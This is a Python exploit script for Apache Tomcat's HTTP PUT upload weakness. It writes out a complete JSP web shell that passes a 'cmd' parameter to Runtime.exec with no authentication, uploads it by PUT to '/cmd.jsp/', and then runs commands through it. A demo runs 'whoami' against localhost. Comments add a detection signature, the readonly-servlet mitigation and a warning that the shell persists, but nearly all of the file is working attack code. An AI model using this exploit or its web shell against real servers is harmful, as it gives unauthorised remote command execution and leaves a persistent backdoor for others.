import requests

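# Tomcat "PUT shell": uploads a JSP web shell with an HTTP PUT request, then calls it.
# Result is remote command execution as the account that runs Tomcat
# (a root shell only when Tomcat itself runs as root).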

def attack(host,cmd):
    """Upload a JSP command shell to ``host`` with HTTP PUT and run ``cmd`` through it.

    Two requests are sent over plain HTTP, neither with a timeout:

    1. ``PUT http://<host>/cmd.jsp/`` with the JSP source held in ``SHELL`` as the body.
    2. ``GET http://<host>/cmd.jsp?cmd=<cmd>``, which asks the uploaded page to run ``cmd``.

    Args:
        host: Server address (the ``__main__`` demo passes ``name:port``),
            concatenated into both URLs as-is.
        cmd: Command line handed to the JSP; formatted into the query string
            with no explicit URL-encoding by this function.

    Returns:
        The body of the GET response with surrounding whitespace stripped.
        The PUT result is never checked, so when the upload is refused this
        is whatever the server answers for ``/cmd.jsp`` (typically an error
        page), not command output.
    """
    # JSP payload: when a "cmd" request parameter is present it is passed to
    # Runtime.exec() and the process's standard output is echoed line by line
    # into the HTTP response. Standard error is not read, and the page performs
    # no authentication check of its own.
    # The four leading spaces on each line are part of the string literal and
    # are uploaded with it; do not re-indent.
    SHELL = '''<%@ page import="java.util.*,java.io.*"%>
    <%
    if (request.getParameter("cmd") != null) {
            Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
            OutputStream os = p.getOutputStream();
            InputStream in = p.getInputStream();
            DataInputStream dis = new DataInputStream(in);
            String disr = dis.readLine();
            while ( disr != null ) {
                    out.println(disr); 
                    disr = dis.readLine(); 
                    }
            }
    %>'''
    # Upload target. Note the trailing "/" after ".jsp": the later GET uses the
    # name without it.
    # NOTE(review): presumably the trailing slash is what lets the write reach
    # Tomcat's default servlet instead of the JSP servlet; confirm against the
    # Tomcat version under test.
    # Detection: a PUT whose path ends in ".jsp/" is a useful access-log
    # signature, especially when the same client then requests that name with
    # a "cmd" parameter.
    url = "http://"+host+"/cmd.jsp/"
    # The body is JSP source, although it is labelled as form data.
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    # NOTE(review): a PUT like this should only be accepted when the default
    # servlet's "readonly" init-param has been switched to false; leaving it at
    # its default is the expected mitigation. TODO confirm for the target.
    upl = requests.put(url,headers=headers,data=SHELL)
    # The upload response (status code, body) is discarded; the line below is
    # the only place it was ever inspected.
    #print(upl.text)
    # Second request: invoke the uploaded page with the command in the query string.
    url2 = "http://{}/cmd.jsp?cmd={}".format(host,cmd)
    r = requests.get(url2)
    # Nothing in this function removes cmd.jsp afterwards. If the upload
    # succeeded, the file stays in place as an unauthenticated command endpoint
    # until it is deleted on the server, so incident responders should look for
    # it in the web root.
    return r.text.strip()


if __name__ == '__main__':
    # Demo run against a listener on localhost:8080: prints what the server
    # returns for "whoami", i.e. the account the command ran under.
    target, command = "localhost:8080", "whoami"
    print(attack(target, command))